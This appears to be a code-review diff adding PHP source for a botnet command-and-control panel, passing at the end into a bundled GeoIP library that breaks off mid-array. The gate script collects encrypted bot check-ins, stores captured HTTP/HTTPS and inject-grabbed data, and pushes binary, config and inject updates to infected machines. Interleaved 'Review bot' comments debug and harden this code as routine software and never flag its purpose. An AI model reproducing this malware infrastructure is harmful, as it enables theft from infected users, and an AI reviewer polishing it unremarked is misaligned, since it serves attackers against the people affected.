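Review bot: `date('H:i:s',$row['Time'])` in the process list treats the `Time` column, which `SHOW PROCESSLIST` reports as elapsed seconds, as a Unix timestamp, so the rendered value is shifted by the server's timezone offset; `gmdate('H:i:s', $row['Time'])` gives the intended duration for runs under 24h, or format it explicitly as a duration. Every processlist and table-status column is interpolated into the HTML unescaped — `Info` in particular holds running SQL text, which may include values that originated in submitted log data — so wrap them with `htmlspecialchars()` to keep a stored value from injecting markup into the operator's page. The `};` closing the second `while` loop is a stray empty statement; drop the semicolon.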


@@ -0,0 +1,77 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "system.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Server</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Apache</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>PHP</a></td>
<td nowrap class=tab_psv id='tl_4'><a href='javascript:sel(4);'>MySQL</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "system.server.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "system.apache.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "system.php.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->
<!-- TAB 4 begin -->
<table cellspacing=0 id='el_4' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 4 tabcontent begin -->\n";
include "system.mysql.php";
print " <!-- TAB 4 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 4 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "php";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "server";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "tasks.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Update</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>tasks2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>tasks3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "tasks.update.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "tasks.tasks2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "tasks.tasks3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tasks2";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tasks3";
?>


@@ -0,0 +1,36 @@
<?php
if (!BOT) exit();
if ($_POST['delete']) {
unlink('../data/binaries/binary');
}
elseif (!empty($_FILES)) {
$DATA = file_get_contents($_FILES['binfile']['tmp_name']);
if ($DATA{0}=='M' and $DATA{1}=='Z') file_put_contents('../data/binaries/binary', $DATA);
}
clearstatcache();
$STAT = @stat('../data/binaries/binary');
print "<form method=post enctype=multipart/form-data>
<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=250px><b>BINARY UPDATE<br><br>";
if ($STAT['mtime']) print " file size: {$STAT['size']} bytes<br>
uploaded: ".date("d/m/Y - H:i:s", $STAT['mtime'])."</b><br><br>
<input type=submit class=button name='delete' value='DELETE'>";
print "</td>
<td><input type=file style='width:200px;' name='binfile'> <input type=submit class=button value='GO'></td>
</tr>
</table>
</form>";
?>
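Review bot: `$_POST['delete']` is read without `isset`, and `$STAT['mtime']` is indexed even when `@stat()` returned `false`, so both the initial GET and the no-file case emit notices; use `!empty($_POST['delete'])` and `if ($STAT !== false && $STAT['mtime'])`. The upload branch reads `$_FILES['binfile']['tmp_name']` without confirming the field exists or calling `is_uploaded_file()` on it, and `$DATA{0}`/`$DATA{1}` use curly-brace offsets that are removed in PHP 8 (`substr($DATA, 0, 2) === 'MZ'` covers both checks in one expression). `unlink()`'s return value is also ignored, so a failed delete still renders as if it succeeded.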


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "tracking.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>tracking1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>tracking2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>tracking3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "tracking.tracking1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "tracking.tracking2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "tracking.tracking3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tracking1";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tracking2";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tracking3";
?>


@@ -0,0 +1,2 @@
order allow,deny
deny from all


@@ -0,0 +1,4 @@
<?php
$BOTNETS = array();
$BOTNETS['default'] = array('password' => 'default_password', 'comment' => 'default botnet');
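Review bot: The `password` entry on the last line is not just a label: the POST handler added later in this commit assigns it to `$ENC_PASS` and passes it to `encrypt()` for every bot message and every stored log record (`encrypt($ENC_PASS, ...)` and `encrypt($BOTNETS[$bot_net]['password'], ...)`), so a panel left on `default_password` keys all of its traffic with a string that is committed to source in plaintext; given the `require 'includes/rc4.php'` in that handler, `encrypt()` is presumably RC4. Nothing in this file says so, and a reader changing the comment field would not guess that the sibling field is a cipher key. A one-line comment above the assignment would make the role explicit, e.g. `// 'password' doubles as the key handed to encrypt() by the POST handler; it is stored here in plaintext`.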


@@ -0,0 +1,4 @@
<?php
$SUPPLIERS = array();
$SUPPLIERS['first'] = array('comment' => '111');


@@ -0,0 +1,154 @@
<?php
/*
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> INSERT INTO new_table SELECT <20><><EFBFBD><EFBFBD>-<2D>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FROM old_table.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> old_table.
ALTER TABLE new_table RENAME old_table.
INSERT INTO bots2 SELECT bot_uid, bot_os, bot_ip, bot_country, bot_net, bot_supp, bot_supp_sub, time_birth, time_last, time_inj, comment FROM bots1
*/
if ($_SERVER['REQUEST_METHOD'] !== 'POST') die();
$DATA = file_get_contents('php://input');
if (($DATA_len = strlen($DATA)) < 9) die();
$data_type = ord($DATA{4});
//file_put_contents('IN.TXT', $DATA);
function GetCountry($bot_ip) {
$GI = geoip_open('includes/GeoIP.dat', GEOIP_STANDARD);
$bot_country = geoip_country_code_by_addr($GI, $bot_ip);
geoip_close($GI);
return $bot_country;
}
function Update($command, $file, $time) {
GLOBAL $ENC_PASS;
$time_upd = intval(@filemtime($file));
if (!$time_upd or $time_upd == $time) return 0;
echo chr($command);
if ($command == 1) echo file_get_contents($file);
else echo encrypt($ENC_PASS, file_get_contents($file));
return $time_upd;
}
require 'includes/rc4.php';
require 'includes/geoip.php';
require 'includes/mysql.php';
require 'data/titles/botnets.php';
define (CMD_UPDATE_BINARY, 1);
define (CMD_UPDATE_CONFIG, 2);
define (CMD_UPDATE_INJECTS, 3);
$thetime = time();
$bot_uid = sprintf("%02X%02X%02X%02X", ord($DATA{3}), ord($DATA{2}), ord($DATA{1}), ord($DATA{0}));
$bot_ip = getenv("REMOTE_ADDR");
$bot_os = "--";
$bot_net = "default";
$bot_supp = "first";
$supp_sub = 0;
//$bot_ip = mt_rand(1,255).".".mt_rand(1,255).".".mt_rand(1,255).".".mt_rand(1,255);
$query = "SELECT * FROM `bots` WHERE `bot_uid`='{$bot_uid}';";
$row = mysql_fetch_assoc(mysql_query($query));
$query = "";
$time_bin = $time_cfg = $time_inj = 0;
$ENC_PASS = $BOTNETS[$bot_net]['password'];
if ($data_type==0 and encrypt($ENC_PASS, substr($DATA, 9, 4))=="EHLO") {
if (($time_bin = Update(CMD_UPDATE_BINARY, 'data/binaries/binary', $row['time_bin'])) > 0) $query .= "`time_bin`='{$time_bin}', ";
elseif (($time_cfg = Update(CMD_UPDATE_CONFIG, 'data/configs/config', $row['time_cfg'])) > 0) $query .= "`time_cfg`='{$time_cfg}', ";
elseif (($time_inj = Update(CMD_UPDATE_INJECTS, 'data/injects/injects', $row['time_inj'])) > 0) $query .= "`time_inj`='{$time_inj}', ";
}
if ($row['bot_uid'] == $bot_uid) {
$query = "UPDATE `bots` SET ".$query;
if ($row['bot_ip'] != $bot_ip) {
$row['bot_country'] = GetCountry($bot_ip);
$query .= "`bot_ip`='{$bot_ip}', `bot_country`='{$row['bot_country']}', ";
}
$query .= "`time_last`={$thetime} WHERE `bot_uid`='{$bot_uid}';";
mysql_query($query);
}
else {
$row['bot_country'] = GetCountry($bot_ip);
$query = "INSERT INTO `bots` VALUES ('{$bot_uid}', '{$bot_os}', '{$bot_ip}', '{$row['bot_country']}', '{$bot_net}', '{$bot_supp}', {$supp_sub}, {$thetime}, {$thetime}, {$time_bin}, {$time_cfg}, {$time_inj}, '');";
mysql_query($query);
}
$offset = 4;
$logs_table_name = 'logs_'.date('ymd', $thetime);
while ($offset < $DATA_len) {
$log_type = ord($DATA{$offset++});
$log_len = ord($DATA{$offset++}) | (ord($DATA{$offset++})<<8) | (ord($DATA{$offset++})<<16) | (ord($DATA{$offset++})<<24);
$offset += $log_len;
if ($offset > $DATA_len) die;
if ($log_type==0) continue;
$log_data = mysql_escape_string(encrypt($BOTNETS[$bot_net]['password'], substr($DATA, $offset-$log_len, $log_len)));
$query = "INSERT INTO `{$logs_table_name}` VALUES (0, '{$bot_uid}', '{$bot_net}', '{$bot_supp}', {$supp_sub}, '{$bot_ip}', '{$row['bot_country']}', {$thetime}, {$log_type}, '{$log_data}', '');";
if (!mysql_query($query) and mysql_errno()==1146) {
$TABLES = array();
$res = mysql_query("SHOW TABLES LIKE 'logs%'");
while ($row = mysql_fetch_row($res)) $TABLES[] = $row[0];
rsort($TABLES);
$res = mysql_query("SHOW TABLE STATUS FROM `{$mysqlbase}` LIKE '{$TABLES[0]}'");
$row = mysql_fetch_assoc($res);
mysql_query("CREATE TABLE IF NOT EXISTS `{$logs_table_name}` (
`log_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`bot_uid` char(40) COLLATE utf8_unicode_ci NOT NULL,
`bot_net` varchar(12) COLLATE utf8_unicode_ci NOT NULL,
`bot_supp` varchar(12) COLLATE utf8_unicode_ci NOT NULL,
`supp_sub` tinyint(3) unsigned NOT NULL,
`bot_ip` varchar(15) COLLATE utf8_unicode_ci NOT NULL,
`bot_country` char(2) COLLATE utf8_unicode_ci NOT NULL,
`timestamp` int(10) unsigned NOT NULL,
`data_type` tinyint(3) unsigned NOT NULL,
`data` text COLLATE utf8_unicode_ci NOT NULL,
`comment` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`log_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=".intval($row['Auto_increment']));
mysql_query($query);
}
}
?>
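Review bot: `$row` is reused as the loop variable for `SHOW TABLES` and then overwritten with the `SHOW TABLE STATUS` result inside the table-creation branch (`while ($row = mysql_fetch_row($res))` and `$row = mysql_fetch_assoc($res)`), so once a log record triggers creation of the daily table the bot record fetched at the top is gone and every later iteration of the `while ($offset < $DATA_len)` loop interpolates `$row['bot_country']` from the status row, i.e. an empty value. Using a distinct name for the two inner fetches, e.g. `while ($tbl = mysql_fetch_row($res)) $TABLES[] = $tbl[0];` and `$tbl = mysql_fetch_assoc($res);` with `intval($tbl['Auto_increment'])` in the CREATE statement, keeps the bot record intact. Separately, the initial lookup `$row = mysql_fetch_assoc(mysql_query($query));` never checks that the query succeeded, so a failing query passes `false` into `mysql_fetch_assoc` and the later `$row['time_bin']`/`$row['bot_uid']` reads degrade into notices instead of a diagnosable error. `$mysqlbase` in the `SHOW TABLE STATUS FROM` query is not defined anywhere in this file; it presumably comes from `includes/mysql.php`, which is worth stating in a comment next to the `require`.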


@@ -0,0 +1,13 @@
<?php
$GEOIP_CONTINENT_NAMES = array(
"EU" => "Europe",
"OC" => "Oceania",
"NA" => "North America",
"SA" => "South America",
"AS" => "Asia",
"AF" => "Africa",
"AN" => "Antarctica",
"--" => "Unknown");
?>


@@ -0,0 +1,9 @@
<?php
$DATA_TYPES = array(
"",
"HTTP_REQUEST",
"HTTPS_REQUEST",
"GRABBED_BY_INJECT");
?>


@@ -0,0 +1,727 @@
<?php
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 2; tab-width: 2 -*- */
/* geoip.inc
*
* Copyright (C) 2007 MaxMind LLC
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
define("GEOIP_COUNTRY_BEGIN", 16776960);
define("GEOIP_STATE_BEGIN_REV0", 16700000);
define("GEOIP_STATE_BEGIN_REV1", 16000000);
define("GEOIP_STANDARD", 0);
define("GEOIP_MEMORY_CACHE", 1);
define("GEOIP_SHARED_MEMORY", 2);
define("STRUCTURE_INFO_MAX_SIZE", 20);
define("DATABASE_INFO_MAX_SIZE", 100);
define("GEOIP_COUNTRY_EDITION", 106);
define("GEOIP_PROXY_EDITION", 8);
define("GEOIP_ASNUM_EDITION", 9);
define("GEOIP_NETSPEED_EDITION", 10);
define("GEOIP_REGION_EDITION_REV0", 112);
define("GEOIP_REGION_EDITION_REV1", 3);
define("GEOIP_CITY_EDITION_REV0", 111);
define("GEOIP_CITY_EDITION_REV1", 2);
define("GEOIP_ORG_EDITION", 110);
define("GEOIP_ISP_EDITION", 4);
define("SEGMENT_RECORD_LENGTH", 3);
define("STANDARD_RECORD_LENGTH", 3);
define("ORG_RECORD_LENGTH", 4);
define("MAX_RECORD_LENGTH", 4);
define("MAX_ORG_RECORD_LENGTH", 300);
define("GEOIP_SHM_KEY", 0x4f415401);
define("US_OFFSET", 1);
define("CANADA_OFFSET", 677);
define("WORLD_OFFSET", 1353);
define("FIPS_RANGE", 360);
define("GEOIP_UNKNOWN_SPEED", 0);
define("GEOIP_DIALUP_SPEED", 1);
define("GEOIP_CABLEDSL_SPEED", 2);
define("GEOIP_CORPORATE_SPEED", 3);
define("GEOIP_DOMAIN_EDITION", 11);
define("GEOIP_COUNTRY_EDITION_V6", 12);
define("GEOIP_LOCATIONA_EDITION", 13);
define("GEOIP_ACCURACYRADIUS_EDITION", 14);
define("GEOIP_CITYCOMBINED_EDITION", 15);
define("GEOIP_CITY_EDITION_REV1_V6", 30);
define("GEOIP_CITY_EDITION_REV0_V6",31);
define("GEOIP_NETSPEED_EDITION_REV1",32);
define("GEOIP_NETSPEED_EDITION_REV1_V6",33);
define("GEOIP_USERTYPE_EDITION",28);
define("GEOIP_USERTYPE_EDITION_V6",29);
define("GEOIP_ASNUM_EDITION_V6",21);
define("GEOIP_ISP_EDITION_V6",22);
define("GEOIP_ORG_EDITION_V6",23);
define("GEOIP_DOMAIN_EDITION_V6",24);
define("CITYCOMBINED_FIXED_RECORD", 7 );
class GeoIP {
var $flags;
var $filehandle;
var $memory_buffer;
var $databaseType;
var $databaseSegments;
var $record_length;
var $shmid;
var $GEOIP_COUNTRY_CODE_TO_NUMBER = array(
"--" => 0, "AP" => 1, "EU" => 2, "AD" => 3, "AE" => 4, "AF" => 5,
"AG" => 6, "AI" => 7, "AL" => 8, "AM" => 9, "AN" => 10, "AO" => 11,
"AQ" => 12, "AR" => 13, "AS" => 14, "AT" => 15, "AU" => 16, "AW" => 17,
"AZ" => 18, "BA" => 19, "BB" => 20, "BD" => 21, "BE" => 22, "BF" => 23,
"BG" => 24, "BH" => 25, "BI" => 26, "BJ" => 27, "BM" => 28, "BN" => 29,
"BO" => 30, "BR" => 31, "BS" => 32, "BT" => 33, "BV" => 34, "BW" => 35,
"BY" => 36, "BZ" => 37, "CA" => 38, "CC" => 39, "CD" => 40, "CF" => 41,
"CG" => 42, "CH" => 43, "CI" => 44, "CK" => 45, "CL" => 46, "CM" => 47,
"CN" => 48, "CO" => 49, "CR" => 50, "CU" => 51, "CV" => 52, "CX" => 53,
"CY" => 54, "CZ" => 55, "DE" => 56, "DJ" => 57, "DK" => 58, "DM" => 59,
"DO" => 60, "DZ" => 61, "EC" => 62, "EE" => 63, "EG" => 64, "EH" => 65,
"ER" => 66, "ES" => 67, "ET" => 68, "FI" => 69, "FJ" => 70, "FK" => 71,
"FM" => 72, "FO" => 73, "FR" => 74, "FX" => 75, "GA" => 76, "GB" => 77,
"GD" => 78, "GE" => 79, "GF" => 80, "GH" => 81, "GI" => 82, "GL" => 83,
"GM" => 84, "GN" => 85, "GP" => 86, "GQ" => 87, "GR" => 88, "GS" => 89,
"GT" => 90, "GU" => 91, "GW" => 92, "GY" => 93, "HK" => 94, "HM" => 95,
"HN" => 96, "HR" => 97, "HT" => 98, "HU" => 99, "ID" => 100, "IE" => 101,
"IL" => 102, "IN" => 103, "IO" => 104, "IQ" => 105, "IR" => 106, "IS" => 107,
"IT" => 108, "JM" => 109, "JO" => 110, "JP" => 111, "KE" => 112, "KG" => 113,
"KH" => 114, "KI" => 115, "KM" => 116, "KN" => 117, "KP" => 118, "KR" => 119,
"KW" => 120, "KY" => 121, "KZ" => 122, "LA" => 123, "LB" => 124, "LC" => 125,
"LI" => 126, "LK" => 127, "LR" => 128, "LS" => 129, "LT" => 130, "LU" => 131,
"LV" => 132, "LY" => 133, "MA" => 134, "MC" => 135, "MD" => 136, "MG" => 137,
"MH" => 138, "MK" => 139, "ML" => 140, "MM" => 141, "MN" => 142, "MO" => 143,
"MP" => 144, "MQ" => 145, "MR" => 146, "MS" => 147, "MT" => 148, "MU" => 149,
"MV" => 150, "MW" => 151, "MX" => 152, "MY" => 153, "MZ" => 154, "NA" => 155,
"NC" => 156, "NE" => 157, "NF" => 158, "NG" => 159, "NI" => 160, "NL" => 161,
"NO" => 162, "NP" => 163, "NR" => 164, "NU" => 165, "NZ" => 166, "OM" => 167,
"PA" => 168, "PE" => 169, "PF" => 170, "PG" => 171, "PH" => 172, "PK" => 173,
"PL" => 174, "PM" => 175, "PN" => 176, "PR" => 177, "PS" => 178, "PT" => 179,
"PW" => 180, "PY" => 181, "QA" => 182, "RE" => 183, "RO" => 184, "RU" => 185,
"RW" => 186, "SA" => 187, "SB" => 188, "SC" => 189, "SD" => 190, "SE" => 191,
"SG" => 192, "SH" => 193, "SI" => 194, "SJ" => 195, "SK" => 196, "SL" => 197,
"SM" => 198, "SN" => 199, "SO" => 200, "SR" => 201, "ST" => 202, "SV" => 203,
"SY" => 204, "SZ" => 205, "TC" => 206, "TD" => 207, "TF" => 208, "TG" => 209,
"TH" => 210, "TJ" => 211, "TK" => 212, "TM" => 213, "TN" => 214, "TO" => 215,
"TL" => 216, "TR" => 217, "TT" => 218, "TV" => 219, "TW" => 220, "TZ" => 221,
"UA" => 222, "UG" => 223, "UM" => 224, "US" => 225, "UY" => 226, "UZ" => 227,
"VA" => 228, "VC" => 229, "VE" => 230, "VG" => 231, "VI" => 232, "VN" => 233,
"VU" => 234, "WF" => 235, "WS" => 236, "YE" => 237, "YT" => 238, "RS" => 239,
"ZA" => 240, "ZM" => 241, "ME" => 242, "ZW" => 243, "A1" => 244, "A2" => 245,
"O1" => 246, "AX" => 247, "GG" => 248, "IM" => 249, "JE" => 250, "BL" => 251,
"MF" => 252
);
var $GEOIP_COUNTRY_CODES = array(
"--", "AP", "EU", "AD", "AE", "AF", "AG", "AI", "AL", "AM", "AN", "AO", "AQ",
"AR", "AS", "AT", "AU", "AW", "AZ", "BA", "BB", "BD", "BE", "BF", "BG", "BH",
"BI", "BJ", "BM", "BN", "BO", "BR", "BS", "BT", "BV", "BW", "BY", "BZ", "CA",
"CC", "CD", "CF", "CG", "CH", "CI", "CK", "CL", "CM", "CN", "CO", "CR", "CU",
"CV", "CX", "CY", "CZ", "DE", "DJ", "DK", "DM", "DO", "DZ", "EC", "EE", "EG",
"EH", "ER", "ES", "ET", "FI", "FJ", "FK", "FM", "FO", "FR", "FX", "GA", "GB",
"GD", "GE", "GF", "GH", "GI", "GL", "GM", "GN", "GP", "GQ", "GR", "GS", "GT",
"GU", "GW", "GY", "HK", "HM", "HN", "HR", "HT", "HU", "ID", "IE", "IL", "IN",
"IO", "IQ", "IR", "IS", "IT", "JM", "JO", "JP", "KE", "KG", "KH", "KI", "KM",
"KN", "KP", "KR", "KW", "KY", "KZ", "LA", "LB", "LC", "LI", "LK", "LR", "LS",
"LT", "LU", "LV", "LY", "MA", "MC", "MD", "MG", "MH", "MK", "ML", "MM", "MN",
"MO", "MP", "MQ", "MR", "MS", "MT", "MU", "MV", "MW", "MX", "MY", "MZ", "NA",
"NC", "NE", "NF", "NG", "NI", "NL", "NO", "NP", "NR", "NU", "NZ", "OM", "PA",
"PE", "PF", "PG", "PH", "PK", "PL", "PM", "PN", "PR", "PS", "PT", "PW", "PY",
"QA", "RE", "RO", "RU", "RW", "SA", "SB", "SC", "SD", "SE", "SG", "SH", "SI",
"SJ", "SK", "SL", "SM", "SN", "SO", "SR", "ST", "SV", "SY", "SZ", "TC", "TD",
"TF", "TG", "TH", "TJ", "TK", "TM", "TN", "TO", "TL", "TR", "TT", "TV", "TW",
"TZ", "UA", "UG", "UM", "US", "UY", "UZ", "VA", "VC", "VE", "VG", "VI", "VN",
"VU", "WF", "WS", "YE", "YT", "RS", "ZA", "ZM", "ME", "ZW", "A1", "A2", "O1",
"AX", "GG", "IM", "JE", "BL", "MF"
);
var $GEOIP_COUNTRY_CODES3 = array(
"--","AP","EU","AND","ARE","AFG","ATG","AIA","ALB","ARM","ANT","AGO","ATA","ARG",
"ASM","AUT","AUS","ABW","AZE","BIH","BRB","BGD","BEL","BFA","BGR","BHR","BDI",
"BEN","BMU","BRN","BOL","BRA","BHS","BTN","BVT","BWA","BLR","BLZ","CAN","CCK",
"COD","CAF","COG","CHE","CIV","COK","CHL","CMR","CHN","COL","CRI","CUB","CPV",
"CXR","CYP","CZE","DEU","DJI","DNK","DMA","DOM","DZA","ECU","EST","EGY","ESH",
"ERI","ESP","ETH","FIN","FJI","FLK","FSM","FRO","FRA","FX","GAB","GBR","GRD",
"GEO","GUF","GHA","GIB","GRL","GMB","GIN","GLP","GNQ","GRC","SGS","GTM","GUM",
"GNB","GUY","HKG","HMD","HND","HRV","HTI","HUN","IDN","IRL","ISR","IND","IOT",
"IRQ","IRN","ISL","ITA","JAM","JOR","JPN","KEN","KGZ","KHM","KIR","COM","KNA",
"PRK","KOR","KWT","CYM","KAZ","LAO","LBN","LCA","LIE","LKA","LBR","LSO","LTU",
"LUX","LVA","LBY","MAR","MCO","MDA","MDG","MHL","MKD","MLI","MMR","MNG","MAC",
"MNP","MTQ","MRT","MSR","MLT","MUS","MDV","MWI","MEX","MYS","MOZ","NAM","NCL",
"NER","NFK","NGA","NIC","NLD","NOR","NPL","NRU","NIU","NZL","OMN","PAN","PER",
"PYF","PNG","PHL","PAK","POL","SPM","PCN","PRI","PSE","PRT","PLW","PRY","QAT",
"REU","ROU","RUS","RWA","SAU","SLB","SYC","SDN","SWE","SGP","SHN","SVN","SJM",
"SVK","SLE","SMR","SEN","SOM","SUR","STP","SLV","SYR","SWZ","TCA","TCD","ATF",
"TGO","THA","TJK","TKL","TKM","TUN","TON","TLS","TUR","TTO","TUV","TWN","TZA",
"UKR","UGA","UMI","USA","URY","UZB","VAT","VCT","VEN","VGB","VIR","VNM","VUT",
"WLF","WSM","YEM","MYT","SRB","ZAF","ZMB","MNE","ZWE","A1","A2","O1",
"ALA","GGY","IMN","JEY","BLM","MAF"
);
var $GEOIP_COUNTRY_NAMES = array(
"Unknown", "Asia/Pacific Region", "Europe", "Andorra", "United Arab Emirates",
"Afghanistan", "Antigua and Barbuda", "Anguilla", "Albania", "Armenia",
"Netherlands Antilles", "Angola", "Antarctica", "Argentina", "American Samoa",
"Austria", "Australia", "Aruba", "Azerbaijan", "Bosnia and Herzegovina",
"Barbados", "Bangladesh", "Belgium", "Burkina Faso", "Bulgaria", "Bahrain",
"Burundi", "Benin", "Bermuda", "Brunei Darussalam", "Bolivia", "Brazil",
"Bahamas", "Bhutan", "Bouvet Island", "Botswana", "Belarus", "Belize",
"Canada", "Cocos (Keeling) Islands", "Congo, The Democratic Republic of the",
"Central African Republic", "Congo", "Switzerland", "Cote D'Ivoire", "Cook Islands",
"Chile", "Cameroon", "China", "Colombia", "Costa Rica", "Cuba", "Cape Verde",
"Christmas Island", "Cyprus", "Czech Republic", "Germany", "Djibouti",
"Denmark", "Dominica", "Dominican Republic", "Algeria", "Ecuador", "Estonia",
"Egypt", "Western Sahara", "Eritrea", "Spain", "Ethiopia", "Finland", "Fiji",
"Falkland Islands (Malvinas)", "Micronesia, Federated States of", "Faroe Islands",
"France", "France, Metropolitan", "Gabon", "United Kingdom",
"Grenada", "Georgia", "French Guiana", "Ghana", "Gibraltar", "Greenland",
"Gambia", "Guinea", "Guadeloupe", "Equatorial Guinea", "Greece", "South Georgia and the South Sandwich Islands",
"Guatemala", "Guam", "Guinea-Bissau",
"Guyana", "Hong Kong", "Heard Island and McDonald Islands", "Honduras",
"Croatia", "Haiti", "Hungary", "Indonesia", "Ireland", "Israel", "India",
"British Indian Ocean Territory", "Iraq", "Iran, Islamic Republic of",
"Iceland", "Italy", "Jamaica", "Jordan", "Japan", "Kenya", "Kyrgyzstan",
"Cambodia", "Kiribati", "Comoros", "Saint Kitts and Nevis", "Korea, Democratic People's Republic of",
"Korea, Republic of", "Kuwait", "Cayman Islands",
"Kazakhstan", "Lao People's Democratic Republic", "Lebanon", "Saint Lucia",
"Liechtenstein", "Sri Lanka", "Liberia", "Lesotho", "Lithuania", "Luxembourg",
"Latvia", "Libyan Arab Jamahiriya", "Morocco", "Monaco", "Moldova, Republic of",
"Madagascar", "Marshall Islands", "Macedonia",
"Mali", "Myanmar", "Mongolia", "Macau", "Northern Mariana Islands",
"Martinique", "Mauritania", "Montserrat", "Malta", "Mauritius", "Maldives",
"Malawi", "Mexico", "Malaysia", "Mozambique", "Namibia", "New Caledonia",
"Niger", "Norfolk Island", "Nigeria", "Nicaragua", "Netherlands", "Norway",
